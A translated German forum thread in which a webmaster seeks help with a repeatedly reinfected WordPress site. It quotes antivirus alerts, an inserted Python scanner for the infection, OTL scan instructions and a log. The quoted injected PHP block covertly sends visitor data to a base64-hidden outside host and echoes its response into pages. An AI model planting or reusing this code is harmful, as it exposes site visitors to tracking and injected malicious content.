
Pests of all kinds and how to fight them: Own website infected with malware

18.02.2013, 23:05   #1
martinbu
 
Hello everyone,

I have known this forum for quite a while and am impressed by the service offered here. Now the time has come that I have a problem of my own that I cannot get any further with by myself. I hope I will get the same great help here that many others have already received.

I am the webmaster of a website (www.tus-schildgen.de). For months I have been struggling with viruses on the site again and again. I am attaching various virus alerts that I have received from different people over the past months. The high point was that the website was redirected to a virus-infected fantasy blog (blog.fantasygifts.com); I have no virus alert for that. Mostly I was able to solve the problem by using FileZilla to delete and replace all files that had been changed recently. I also changed the password each time. However, that only ever worked for a short time, and a few days later the site was infected again. According to Malwarebytes, my laptop itself is virus-free.

Now I have looked into the problem more intensively. At the moment I can open the site without a virus alert; I have AntiVir installed as my virus scanner.

I researched on the Internet and came across the following page: hxxp://evuln.com/hacked/redirect.html#1

In the course of my further research I then came across this article: hxxp://paid4magazin.de/index.php/base64-eval-php-script-hack-php-trojaner-befallt-webseiten-durch-malware/

Both pages, especially the second article, describe exactly the malware code that is present in my infected files (see the last attached quote). Various index.php files as well as page.php and footer.php were affected. I have cleaned all of them, and the code is no longer present in any file on the website. Is the site virus-free now?

I always had the latest WordPress version and the latest plugins installed. However, I never updated the themes, because I had modified one myself. Perhaps that was the mistake? The latest version is installed now. At the moment things are still a bit chaotic, but that will be cleaned up.

So the problem (at least the current one; I do not know how things stand with the older virus alerts) apparently lies on my own computer. However, Malwarebytes does not show any alerts.

I hope I have provided all the information needed to give me first aid. The goal is to get the website completely virus-free and also to secure it against future "attacks". Do the various virus alerts and the current problem I described at the end have the same cause, or are these separate issues? Also a question: can anyone recommend an alternative to FileZilla, since the problem could lie there as well? Thank you in advance for your efforts!

Regards,
Martin

ADDENDUM: Exactly this problem seems to have existed for quite some time. In an old backup from September 2012 I found exactly the same code, only with a slightly changed "aHR0[...]" snippet. Even then, exactly the same 10 files were affected as now. So maybe this really is the cause of all the virus alerts?

Quote:
Quote from virus alert
Kategorie:Intrusion Prevention

Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name der IPS-Warnung,Standardaktionen,Durchgeführte Aktion,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs

25.09.2012 18:34:06,Hoch,Ein Eindringversuch von www.tus-schildgen.de wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Mass Injection Website,Keine Aktion erforderlich,Keine Aktion erforderlich,"www.tus-schildgen.de (80.67.28.124, 80)",www.tus-schildgen.de/,"HASSOPC (xxx.xxx.x.xxx, xxxxx)",xx.xx.xx.xxx (80.67.28.124),"TCP, www-http"

Netzwerkverkehr von <b>www.tus-schildgen.de/</b> entspricht der Signatur eines bekannten Angriffs. Der Angriff wurde von \DEVICE\HARDDISKVOLUME1\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE verursacht.
Quote:
Quote from virus alert
angeforderte URL: hxxp://www.tus-schildgen.de/

Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/Blacole.CV
Quote:
Quote from virus alert
Angeforderte URL: hxxp://www.tus-schildgen.de/
Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/iFrame.aas
Quote:
Quote from virus-infected code
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Edited by martinbu (18.02.2013 at 23:19) Reason: see addendum
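
A check for the injection pattern quoted above, as an added example that is not part of the original post: it decodes every base64_decode('...') string literal in the PHP files of a site copy and reports files where the literal hides a URL, so a changed "aHR0[...]" snippet is still caught. The sample files, the example.invalid URL and all function names are constructed for illustration.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# base64_decode('<literal>') where the literal is long enough to hide a URL.
B64_CALL = re.compile(r"base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=]{16,})\1\s*\)")

# Other traits of the injected block quoted in the post.
TRAITS = {
    "reads_user_agent": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "curl_fetch": re.compile(r"\bcurl_(?:init|exec)\s*\("),
    "echoes_response": re.compile(r"\becho\s+\$\w+"),
}


def decoded_urls(php_source):
    """Return URLs hidden in base64_decode('...') string literals."""
    urls = []
    for match in B64_CALL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(2), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, so not this pattern
        text = raw.decode("utf-8", errors="replace")
        if text.lower().startswith(("http://", "https://")):
            urls.append(text)
    return urls


def inspect_source(php_source):
    """Classify one PHP source string as infected, suspicious or clean."""
    urls = decoded_urls(php_source)
    traits = sorted(name for name, rx in TRAITS.items() if rx.search(php_source))
    if urls and len(traits) == len(TRAITS):
        verdict = "infected"      # hidden URL + user-agent check + curl + echo
    elif urls:
        verdict = "suspicious"    # hidden URL alone still needs a manual look
    else:
        verdict = "clean"
    return {"verdict": verdict, "urls": urls, "traits": traits}


def scan_tree(root):
    """Scan every *.php file below root; return findings keyed by relative path."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        if not path.is_file():
            continue
        result = inspect_source(path.read_text(encoding="utf-8", errors="replace"))
        if result["verdict"] != "clean":
            findings[path.relative_to(root).as_posix()] = result
    return findings


def build_constructed_tree(root):
    """Write constructed sample files (not taken from the affected site)."""
    url_b64 = base64.b64encode(b"http://stats.example.invalid/stat.php").decode()
    img_b64 = base64.b64encode(b"GIF89a constructed pixel data").decode()
    samples = {
        # Shortened stand-in for the injected block, same structure.
        "wp-content/themes/custom/footer.php": (
            "<?php\n"
            "$ua = strtolower($_SERVER['HTTP_USER_AGENT']);\n"
            "$h = curl_init(base64_decode('" + url_b64 + "') . '?useragent=' . urlencode($ua));\n"
            "curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);\n"
            "$r = curl_exec($h);\n"
            "echo $r;\n"
            "?>\n"
        ),
        # Hidden URL without the other traits.
        "link.php": "<?php $target = base64_decode('" + url_b64 + "'); ?>\n",
        # Legitimate base64 use: decodes to binary data, not a URL.
        "pixel.php": "<?php echo base64_decode('" + img_b64 + "'); ?>\n",
        "index.php": "<?php echo 'Hello'; ?>\n",
    }
    for rel, content in samples.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def demo():
    """Build the constructed tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, result in demo().items():
        print(rel, result["verdict"], result["urls"], result["traits"])
```

Run scan_tree() on a downloaded copy of the web root; a clean result only means this pattern is absent, not that the way in has been closed.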

18.02.2013, 23:20   #2
markusg
/// Malware-holic

Hi,
have you updated all forums, CMSs etc.? I haven't looked at the site yet; this is just a first pointer.
Have you changed the passwords for FTP and the SQL database?

18.02.2013, 23:20   #3
martinbu

Yes, all of that was done today.

18.02.2013, 23:22   #4
markusg
/// Malware-holic

Updates, changes to all passwords etc.?
That must not happen just once a year but, as with the PC, immediately on release; subscribe to the respective vendors' newsletters for that.

If you do not have it yet, please download OTL by Oldtimer and save it to your desktop.
  • Please start OTL.exe.
    Vista and Win7 users: right-click and "Run as administrator"
  • Now copy the content into the text box.
Code:
activex
netsvcs
msconfig
%SYSTEMDRIVE%\*.
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%systemroot%\*. /mp /s
C:\Windows\system32\*.tsp
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
explorer.exe
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%USERPROFILE%\*.*
%USERPROFILE%\Local Settings\Temp\*.exe
%USERPROFILE%\Local Settings\Temp\*.dll
%USERPROFILE%\Application Data\*.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs
CREATERESTOREPOINT
         
  • Now please close all programs. (Important)
  • Now please click the Quick Scan button.
  • Now copy the content of OTL.txt and Extra.txt here into your thread

19.02.2013, 00:00   #5
martinbu

Thanks a lot already! Partly also regularly, but today I changed all passwords and installed the updates (which is why the site does not look quite right again yet). I probably did not always keep on top of this enough, and that was the mistake... Here are the two log files.

[QUOTE=OTL.txt]OTL Logfile:
Code:
OTL logfile created on: 18.02.2013 23:28:40 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop
Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
1,93 Gb Total Physical Memory | 0,84 Gb Available Physical Memory | 43,54% Memory free
4,10 Gb Paging File | 2,67 Gb Available in Paging File | 65,16% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 222,88 Gb Total Space | 174,72 Gb Free Space | 78,39% Space Free | Partition Type: NTFS
Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32
Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS
Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS
Drive H: | 465,65 Gb Total Space | 206,65 Gb Free Space | 44,38% Space Free | Partition Type: FAT32
 
Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2013.02.18 23:27:47 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe
PRC - [2013.01.09 15:22:08 | 000,389,168 | ---- | M] (Mozilla Corporation) -- C:\Programme\Mozilla Thunderbird\thunderbird.exe
PRC - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) -- C:\Programme\TeamViewer\Version8\TeamViewer_Service.exe
PRC - [2012.10.25 20:26:26 | 000,527,216 | ---- | M] (AnchorFree Inc.) -- C:\Programme\Hotspot Shield\bin\openvpnas.exe
PRC - [2012.10.25 20:24:22 | 000,389,488 | ---- | M] () -- C:\Programme\Hotspot Shield\bin\hsswd.exe
PRC - [2012.10.25 20:20:26 | 000,418,672 | ---- | M] (AnchorFree Inc.) -- C:\Programme\Hotspot Shield\HssWPR\HssSrv.exe
PRC - [2012.08.08 11:47:47 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avgnt.exe
PRC - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\sched.exe
PRC - [2012.05.08 15:52:55 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avshadow.exe
PRC - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avguard.exe
PRC - [2011.09.05 14:10:44 | 000,040,960 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizerHelper.exe
PRC - [2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009.04.11 07:27:28 | 000,069,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\conime.exe
PRC - [2009.03.03 12:45:11 | 000,296,400 | ---- | M] () -- C:\Programme\Verbindungsassistent\WTGService.exe
PRC - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) -- C:\Programme\LSI SoftModem\agrsmsvc.exe
PRC - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) -- C:\Windows\System32\AEADISRV.EXE
PRC - [2008.01.19 08:38:38 | 001,008,184 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Defender\MSASCui.exe
PRC - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnetwk.exe
PRC - [2008.01.19 08:33:39 | 000,202,240 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnscfg.exe
PRC - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2013.02.16 21:25:22 | 012,433,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\e64304962098e90f0d3f4c33c1b080a6\System.Windows.Forms.ni.dll
MOD - [2013.01.11 11:57:15 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\f042f66c2ad8fd5b8c34fa22cd22079e\System.Management.ni.dll
MOD - [2013.01.10 20:29:26 | 001,593,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\78157a494dc9a7e52be8840decfcd9cc\System.Drawing.ni.dll
MOD - [2013.01.10 20:27:01 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\cc149d08e75f8c53cd28ac926b38c370\System.ni.dll
MOD - [2013.01.10 20:26:52 | 011,492,352 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\2227d1559f87943255069398608d5c56\mscorlib.ni.dll
MOD - [2013.01.09 15:22:09 | 002,242,096 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\mozjs.dll
MOD - [2013.01.09 15:22:09 | 000,158,256 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldap32v60.dll
MOD - [2013.01.09 15:22:09 | 000,022,576 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldappr32v60.dll
MOD - [2012.11.29 22:59:32 | 000,093,696 | ---- | M] () -- C:\Programme\FileZilla\fzshellext.dll
MOD - [2012.11.21 06:26:34 | 000,008,704 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\Thunderbird\Profiles\oun4j9un.default\extensions\mintrayr@tn123.ath.cx\lib\tray_x86-msvc.dll
MOD - [2012.05.30 19:06:48 | 000,087,912 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2012.05.30 19:06:30 | 001,242,512 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe
MOD - [2007.09.02 12:57:36 | 000,069,632 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.dll
 
 
========== Services (SafeList) ==========
 
SRV - [2013.02.08 16:58:20 | 000,251,248 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013.02.08 16:40:03 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Programme\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)
SRV - [2012.10.25 20:26:26 | 000,527,216 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Programme\Hotspot Shield\bin\openvpnas.exe -- (hshld)
SRV - [2012.10.25 20:24:22 | 000,389,488 | ---- | M] () [Auto | Running] -- C:\Programme\Hotspot Shield\bin\hsswd.exe -- (HssWd)
SRV - [2012.10.25 20:20:26 | 000,418,672 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Programme\Hotspot Shield\HssWPR\HssSrv.exe -- (HssSrv)
SRV - [2012.10.25 01:06:44 | 000,078,072 | ---- | M] () [On_Demand | Stopped] -- C:\Programme\Hotspot Shield\bin\HSSTrayService.exe -- (HssTrayService)
SRV - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService)
SRV - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService)
SRV - [2011.09.05 14:10:44 | 000,040,960 | ---- | M] () [Auto | Running] -- C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizerHelper.exe -- (SearchAnonymizer)
SRV - [2009.03.03 12:45:11 | 000,296,400 | ---- | M] () [Auto | Running] -- C:\Programme\Verbindungsassistent\WTGService.exe -- (WTGService)
SRV - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) [Auto | Running] -- C:\Programme\LSI SoftModem\agrsmsvc.exe -- (AgereModemAudio)
SRV - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Windows\System32\AEADISRV.EXE -- (AEADIFilters)
SRV - [2008.01.19 08:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Programme\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)
DRV - [2012.10.10 17:30:42 | 000,035,560 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\System32\drivers\hssdrv6.sys -- (HssDRV6)
DRV - [2012.10.10 17:30:40 | 000,033,512 | ---- | M] (AnchorFree Inc) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\taphss.sys -- (taphss)
DRV - [2012.05.08 15:53:03 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb)
DRV - [2012.05.08 15:53:03 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt)
DRV - [2011.09.16 15:08:07 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr)
DRV - [2009.10.08 15:55:33 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv)
DRV - [2009.08.24 08:14:30 | 000,044,544 | ---- | M] (AzureWave Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\azvusb.sys -- (azvusb)
DRV - [2009.03.27 06:48:22 | 001,810,992 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC)
DRV - [2008.11.21 20:53:40 | 001,204,128 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2008.11.17 15:40:22 | 003,668,480 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw5v32.sys -- (NETw5v32)
DRV - [2008.08.07 14:42:12 | 000,025,392 | ---- | M] (Hewlett-Packard Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\hpdskflt.sys -- (hpdskflt)
DRV - [2008.08.07 14:31:52 | 000,034,608 | ---- | M] (Hewlett-Packard Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\Accelerometer.sys -- (Accelerometer)
DRV - [2008.07.24 11:03:56 | 000,101,760 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ewusbmdm.sys -- (hwdatacard)
DRV - [2008.04.14 22:39:06 | 000,009,344 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CPQBttn.sys -- (HBtnKey)
DRV - [2007.06.14 13:41:00 | 000,466,048 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stk7070P.sys -- (Ltn_stk7070P)
DRV - [2007.06.13 18:30:20 | 000,013,440 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stkrc.sys -- (Ltn_stkrc)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\URLSearchHook: {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\URLSearchHook: {7e111a5c-3d11-4f56-9463-5310c3c69025} - No CLSID value found
IE - HKCU\..\URLSearchHook: {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com.anonymize-me.de/?anonymto=687474703A2F2F7365617263682E6C6976652E636F6D2F726573756C74732E617370783F713D7B7365617263685465726D737D267372633D7B72656665727265723A736F757263653F7D&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&k=0
IE - HKCU\..\SearchScopes\{426BF4AF-9A6D-4F61-B13B-E7638D4E8A35}: "URL" = hxxp://de.wikipedia.org.anonymize-me.de/?to=64652E77696B6970656469612E6F7267&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{453CCCC2-B564-4517-899E-4FF9C03C456E}: "URL" = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1561552
IE - HKCU\..\SearchScopes\{64DFB864-E327-4243-803B-0E4366F31DBA}: "URL" = hxxp://www.myvideo.de.anonymize-me.de/?to=6D79766964656F2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{83CBD1DC-4276-4D62-86EE-A48FC4B55DE5}: "URL" = hxxp://www.pricerunner.de.anonymize-me.de/?to=707269636572756E6E65722E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{B8EAFF3A-CFA9-4BC8-AA05-15B6CF0BF936}: "URL" = hxxp://search.ebay.de.anonymize-me.de/?to=656261792E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{BA45C28F-538E-4ABA-89B8-6ECE3AF2038E}: "URL" = hxxp://www.otto.de.anonymize-me.de/?to=6F74746F2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{D2B767CE-7A6C-4E4A-AF76-17F8EE0E1DE1}: "URL" = hxxp://www.amazon.de.anonymize-me.de/?to=616D617A6F6E2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de/"
FF - prefs.js..extensions.enabledAddons: %7BDDC359D1-844A-42a7-9AA1-88A850A938A8%7D:2.0.15
FF - prefs.js..extensions.enabledAddons: FirefoxToolbar%40gutscheindoktor.de:1.8
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:18.0.2
FF - prefs.js..extensions.enabledItems: {ab91efd4-6975-4081-8552-1b3922ed79e2}:1.0.5.1
FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550
FF - prefs.js..extensions.enabledItems: firejump@firejump.net:1.0.2.5
FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:2.0.13
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}:6.0.31
 
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_149.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.10.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.10.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\linkfilter@kaspersky.ru: C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\FFExt\linkfilter@kaspersky.ru
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]
